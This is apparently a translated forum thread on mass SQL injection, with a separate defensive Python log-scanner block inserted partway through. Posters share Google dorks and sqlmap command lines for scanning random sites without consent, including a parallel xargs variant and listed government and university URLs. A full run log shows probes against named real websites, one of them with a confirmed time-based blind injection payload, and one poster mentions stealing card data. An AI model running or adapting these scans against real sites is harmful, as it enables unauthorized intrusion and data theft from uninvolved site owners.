
SQLi and how to digest it (2019)

well, actually yeah, somehow I didn't immediately think of a custom sqlmap update
Well, it's not exactly custom: sqlmap's settings are stored there in global variables, defaults and all that.
So you can tweak it freely.
 
dokr
Code:
https://www.trickspack.com/fresh-sql-dorks/

https://gbhackers.com/latest-google-sql-dorks/

https://hackingvision.com/2017/04/14/google-dorks-for-sql-injection/

then
sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --skip-static --technique=UET --threads=3 --retries=1 -g "inurl:id=1"

It ran fine for me
sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --skip-static --technique=UET --threads=3 --retries=1 -g "inurl:id=1"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:27:28

[01:27:29] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53'
[01:27:29] [INFO] using search result page #1
[01:27:35] [INFO] sqlmap got 100 results for your search dork expression, 85 of them are testable targets
[01:27:35] [INFO] sqlmap got a total of 85 targets
URL 1:
GET http://www.dipintoguitars.com/category.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:27:35] [INFO] testing URL 'http://www.dipintoguitars.com/category.php?id=1'
[01:27:35] [INFO] using '/root/.sqlmap/output/results-02252019_0127am.csv' as the CSV results file in multiple targets mode
[01:27:40] [INFO] testing connection to the target URL
[01:28:02] [CRITICAL] unable to connect to the target URL ('Connection refused'). sqlmap is going to retry the request(s)
[01:28:02] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
[01:28:23] [ERROR] unable to connect to the target URL ('Connection refused'), skipping to the next URL
URL 2:
GET https://en.wikipedia.org/wiki/ID-1
do you want to test this URL? [Y/n/q]
Y
[01:28:23] [INFO] testing URL 'https://en.wikipedia.org/wiki/ID-1'
[01:28:23] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[01:28:23] [INFO] testing connection to the target URL
[01:28:24] [INFO] testing if URI parameter '#1*' is dynamic
[01:28:24] [INFO] confirming that URI parameter '#1*' is dynamic
[01:28:25] [WARNING] URI parameter '#1*' does not appear to be dynamic
[01:28:25] [INFO] skipping static URI parameter '#1*'
[01:28:25] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[01:28:25] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
URL 3:
GET https://en.wikiyy.com/wiki/ID-1/000
do you want to test this URL? [Y/n/q]
Y
[01:28:25] [INFO] testing URL 'https://en.wikiyy.com/wiki/ID-1/000'
[01:28:25] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[01:28:26] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.freeunblocked.pw/index.php?q=aHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvSUQtMS8wMDA='. Do you want to follow? [Y/n] Y
[01:28:27] [WARNING] URI parameter '#1*' does not appear to be dynamic
[01:28:27] [INFO] skipping static URI parameter '#1*'
[01:28:27] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 4:
GET http://www.atrium.com.pk/Shopping.php?ID=1
do you want to test this URL? [Y/n/q]
Y
[01:28:27] [INFO] testing URL 'http://www.atrium.com.pk/Shopping.php?ID=1'
[01:28:27] [INFO] testing connection to the target URL
[01:28:28] [INFO] testing if GET parameter 'ID' is dynamic
sqlmap got a 302 redirect to 'http://www.atrium.com.pk:80/404.php'. Do you want to follow? [Y/n] Y
[01:28:29] [INFO] confirming that GET parameter 'ID' is dynamic
[01:28:30] [WARNING] GET parameter 'ID' does not appear to be dynamic
[01:28:30] [INFO] skipping static GET parameter 'ID'
[01:28:30] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 5:
GET http://www.romanianwriters.ro/s.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:28:30] [INFO] testing URL 'http://www.romanianwriters.ro/s.php?id=1'
[01:28:30] [INFO] testing connection to the target URL
[01:28:31] [INFO] heuristics detected web page charset 'ISO-8859-2'
[01:28:31] [INFO] testing if GET parameter 'id' is dynamic
[01:28:32] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:32] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:32] [INFO] skipping static GET parameter 'id'
[01:28:32] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 6:
GET http://www.sansihotels.com/hotels.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:28:32] [INFO] testing URL 'http://www.sansihotels.com/hotels.php?id=1'
[01:28:32] [INFO] testing connection to the target URL
[01:28:33] [INFO] heuristics detected web page charset 'UTF-8-SIG'
[01:28:33] [INFO] testing if GET parameter 'id' is dynamic
sqlmap got a 302 redirect to 'http://www.sansihotels.com:80/index.php'. Do you want to follow? [Y/n] Y
[01:28:33] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:34] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:34] [INFO] skipping static GET parameter 'id'
[01:28:34] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 7:
GET http://esjindex.org/search.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:28:34] [INFO] testing URL 'http://esjindex.org/search.php?id=1'
[01:28:34] [INFO] resuming back-end DBMS 'mysql'
[01:28:34] [INFO] testing connection to the target URL
[01:28:35] [INFO] heuristics detected web page charset 'UTF-8-SIG'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(1)-- EpUc
---
do you want to exploit this SQL injection? [Y/n] Y
[01:28:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[01:28:35] [INFO] testing if current user is DBA
[01:28:35] [INFO] fetching current user
[01:28:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[01:28:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[01:28:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[01:28:40] [INFO] retrieved:
current user is DBA: False
URL 8:
GET https://www.bible-history.com/subcat.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:28:48] [INFO] testing URL 'https://www.bible-history.com/subcat.php?id=1'
[01:28:49] [INFO] testing connection to the target URL
[01:28:50] [INFO] testing if GET parameter 'id' is dynamic
[01:28:51] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:52] [INFO] skipping static GET parameter 'id'
[01:28:52] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 9:
GET http://www.xrayrisk.com/calculator/calculator-normal-studies.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:28:52] [INFO] testing URL 'http://www.xrayrisk.com/calculator/calculator-normal-studies.php?id=1'
[01:28:53] [INFO] testing connection to the target URL
[01:28:54] [INFO] testing if GET parameter 'id' is dynamic
[01:28:54] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:54] [INFO] skipping static GET parameter 'id'
[01:28:54] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 10:
GET http://www.cacert.org/index.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:28:54] [INFO] testing URL 'http://www.cacert.org/index.php?id=1'
[01:28:55] [INFO] testing connection to the target URL
[01:28:56] [INFO] testing if GET parameter 'id' is dynamic
[01:28:56] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:56] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:56] [INFO] skipping static GET parameter 'id'
[01:28:56] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 11:
GET http://www.asfaa.org/members.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:28:56] [INFO] testing URL 'http://www.asfaa.org/members.php?id=1'
[01:29:00] [INFO] testing connection to the target URL
[01:29:01] [INFO] testing if GET parameter 'id' is dynamic
[01:29:01] [INFO] confirming that GET parameter 'id' is dynamic
[01:29:02] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:29:02] [INFO] skipping static GET parameter 'id'
[01:29:02] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 12:
GET http://www.bpc.gov.bd/contactus.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:29:02] [INFO] testing URL 'http://www.bpc.gov.bd/contactus.php?id=1'
[01:29:03] [INFO] testing connection to the target URL
[01:29:04] [CRITICAL] page not found (404)
[01:29:04] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
URL 13:
GET http://www.kvm.co.ke/products.php?id=1
do you want to test this URL? [Y/n/q]
Y
[01:29:04] [INFO] testing URL 'http://www.kvm.co.ke/products.php?id=1'
[01:29:05] [INFO] testing connection to the target URL
[01:29:07] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:29:07] [INFO] testing if GET parameter 'id' is dynamic
[01:29:07] [INFO] confirming that GET parameter 'id' is dynamic
[01:29:08] [INFO] GET parameter 'id' is dynamic
[01:29:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[01:29:09] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks
[01:29:09] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:29:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:29:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
It doesn't print the time, but that was about 5 minutes of work
haha, you just have to be careful, or we'll accidentally break Wikipedia
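The defender's side of the run above, as an added example (not from the thread or from sqlmap): a small Python scanner that flags sqlmap-style probes in Apache combined-format access logs, run over constructed log lines that reuse the `id=1' AND SLEEP(1)-- EpUc` payload and the browser User-Agent shown in the output. With --random-agent the agent is a stock browser string, so the check has to look at the decoded parameter values rather than the UA.

```python
"""Spot sqlmap-style injection probes in an Apache "combined" access log.

Added example for this thread, not code from the posts or from sqlmap.
The log lines are constructed; the first probe mirrors the time-based payload
sqlmap reported above (id=1' AND SLEEP(1)-- EpUc) and the User-Agent is the
one --random-agent picked in that run, so UA matching alone would miss it.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: ip ident user [ts] "METHOD target proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shapes typical of sqlmap's detection phase. A comment terminator alone is not
# conclusive (a decoded '#fff' colour value contains one), so it only adds context.
PROBE_PATTERNS = {
    "time_based": re.compile(r"\b(?:SLEEP|BENCHMARK|pg_sleep)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
    "boolean_or_error_based": re.compile(r"['\")]\s*(?:AND|OR)\s+[\w(]", re.I),
    "comment_terminator": re.compile(r"--\s|#|/\*"),
}
CONCLUSIVE = {"time_based", "boolean_or_error_based"}

# Constructed sample: one baseline request, two probes, one benign value containing '#'.
UA = ("Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) "
      "Gecko/20091201 Firefox/3.5.6 Opera 10.53")
SAMPLE_LOG = "\n".join([
    f'203.0.113.7 - - [25/Feb/2019:01:28:34 +0000] "GET /search.php?id=1 HTTP/1.1" 200 5120 "-" "{UA}"',
    f'203.0.113.7 - - [25/Feb/2019:01:28:35 +0000] "GET /search.php?id=1%27%20AND%20SLEEP%281%29--%20EpUc HTTP/1.1" 200 5120 "-" "{UA}"',
    f'203.0.113.7 - - [25/Feb/2019:01:28:36 +0000] "GET /search.php?id=1%27%20AND%201%3D1--%20EpUc HTTP/1.1" 200 5120 "-" "{UA}"',
    '198.51.100.4 - - [25/Feb/2019:01:29:00 +0000] "GET /search.php?id=3&color=%23fff HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/65.0"',
])


def classify(target):
    """Return the set of probe categories matched by any decoded query parameter value."""
    # parse_qsl percent-decodes once; decoding again would mangle legitimate '%25' values.
    values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    return {label for label, pat in PROBE_PATTERNS.items()
            if any(pat.search(v) for v in values)}


def is_probe(hits):
    """A request counts as a probe only if a conclusive category matched."""
    return bool(hits & CONCLUSIVE)


def scan(log_text):
    """Return (flagged_requests, probes_per_ip) for a combined-format log."""
    flagged, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the whole scan
        hits = classify(m["target"])
        if is_probe(hits):
            flagged.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                            "hits": sorted(hits), "ua": m["ua"]})
            per_ip[m["ip"]] += 1
    return flagged, per_ip


if __name__ == "__main__":
    found, counts = scan(SAMPLE_LOG)
    for entry in found:
        print(f'{entry["ip"]} {entry["ts"]} {entry["hits"]} {entry["target"]}')
    for ip, n in counts.most_common():
        print(f"{ip}: {n} probe(s)")
```

Sorting flagged requests by source IP and count is what makes a sqlmap run stand out: one address hammering the same parameter with a dozen variants in a few seconds, even though every request carries a plausible browser agent.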
 
I mentioned AutoSqli in the second post there; it's a mix of sqlmap, googler (for searching via Google), ddgr (for searching via DuckDuckGo) and WhatWaf? (for auto-detecting the WAF)
How this monster works I have no idea, here's the link: https://github.com/jesuiscamille/AutoSQLi
If someone tests it, tell us in the article how it went.
 
ok, I'll put together a review in a week. If people help out with links
 
Write how many links you need, I'll scrape them for you
 
what's wrong with dedicated servers as a topic?

Bruting? Go try to brute even one of them now...

On exploit there was a fresher case, the gist was finding a possible SQL injection with Netsparker, then finishing the injection and dumping with sqlmap.
If you want it without coding, it's a perfectly fine option; all of it ran on servers, the author even wrote that he was pulling CCs.

Send a link to the case, I'm curious.
 
Is that the only method you know? What's the problem with bruting?
 
Anyway, this auto script throws various errors for me, so most likely there won't be an article. Sorry everyone.

https://github.com/Ekultek/WhatWaf For automation lovers

No guys, sorry, it's all crap... By hand is faster and the vectors are better.
 
Hands and/or Burp are always faster ;)
 
you take it, install it and use it, instead of waiting for someone to do it for you and write "click here, type there"
 
It doesn't work very well. It's just a wrapper around other tools; you can look up how each of them works, what it does and how, what it takes as input. Anyway, I took a quick look, nothing complicated, nothing interesting
 
Could do it something like this

url.txt (one target URL per line)
If you need to test the sites for it, then
sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --timeout=1 --skip-static --technique=UET --threads=3 --retries=1 --crawl=2 --form -m url2.txt

Code:
https://rtionline.gov.in/request/status.php
https://www.valdosta.edu/academics/graduate-school/application-status-check.php
These are of course not the fastest options, no idea how to make it run faster. Haven't figured it out yet

The xargs variant should be a bit faster (sort of multithreading)
< url2.txt xargs --max-procs=100 -I{} sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --timeout=1 --skip-static --technique=UET --threads=3 --retries=1 --crawl=2 --form -u {}
(untested, no unix box at hand)
 
I have a job and more interesting and profitable things to do.
I'm extremely skeptical of this solution, too much so to spend time on it.
 
then why are you spending your time posting in this topic, if you don't care about sqli?
 
I don't use it at all, it's crap
 
I never wrote that I "don't care about sqli"; you yourself wrote to me about AutoSqli, how did you miss the context???
(I think someone is just a flooder)
 
I think someone is just dumb.
 